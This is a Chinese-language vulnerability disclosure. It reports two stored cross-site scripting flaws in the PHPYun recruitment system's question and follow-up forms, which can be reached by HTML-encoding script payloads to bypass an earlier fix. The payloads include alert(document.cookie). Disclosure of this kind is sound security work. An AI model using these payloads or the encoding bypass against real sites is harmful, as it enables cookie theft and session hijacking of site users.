### 简要描述:
php云人才系统存储型跨站两处
### 详细说明:
WooYun-2014-73319( [WooYun: php云人才系统存储型跨站多处](http://www.wooyun.org/bugs/wooyun-2014-073319) )曾经报道过这两处存储型跨站,虽然厂商修了,但是还是可以以奇葩的方式XSS跨站。
0x01: 我要提问
================================================================
我们先将要注入的代码做HTML编码,例如:
```
<script>alert(1);</script>
```
编码后为:
```
<script>alert(1);</script>
```
然后贴到内容里面:
[<img src="https://images.seebug.org/upload/201412/24133738752d5973ac5b810cf0270d52586655dc.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/24133738752d5973ac5b810cf0270d52586655dc.png)
添加
[<img src="https://images.seebug.org/upload/201412/24133819af5c902eee5ba5b3a3228d12c28d8435.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/24133819af5c902eee5ba5b3a3228d12c28d8435.png)
添加成功后就可以看到弹框:
[<img src="https://images.seebug.org/upload/201412/24133846bd128e41b2cdede2eae1ee2c0d651d1c.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/24133846bd128e41b2cdede2eae1ee2c0d651d1c.png)
0x02: 追加问题
================================================================
同样,先将要注入的代码做HTML编码,例如:
```
<script>alert(document.cookie);</script>
```
编码后的内容为:
```
<script>alert(document.cookie);</script>
```
然后贴到内容里面:
[<img src="https://images.seebug.org/upload/201412/241341151484e629315ab38e69bb6af68ebd6657.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/241341151484e629315ab38e69bb6af68ebd6657.png)
回答提交后,即可弹框:
[<img src="https://images.seebug.org/upload/201412/24134212c05a57ecbe169ac1c8a0b998f6a64da7.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/24134212c05a57ecbe169ac1c8a0b998f6a64da7.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201412/24133738752d5973ac5b810cf0270d52586655dc.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/24133738752d5973ac5b810cf0270d52586655dc.png)
[<img src="https://images.seebug.org/upload/201412/24133846bd128e41b2cdede2eae1ee2c0d651d1c.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/24133846bd128e41b2cdede2eae1ee2c0d651d1c.png)
[<img src="https://images.seebug.org/upload/201412/241341151484e629315ab38e69bb6af68ebd6657.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/241341151484e629315ab38e69bb6af68ebd6657.png)
[<img src="https://images.seebug.org/upload/201412/24134212c05a57ecbe169ac1c8a0b998f6a64da7.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/24134212c05a57ecbe169ac1c8a0b998f6a64da7.png)
后台看到INSERT的SQL语句为:
```
INSERT INTO `phpyun_question` SET `title`='aaaa',`cid`='54',`content`='<script></script>',`uid`='1',`add_time`='1419394975'
```
应该显示的时候有转了一次编码。
京公网安备 11010502034610号
暂无评论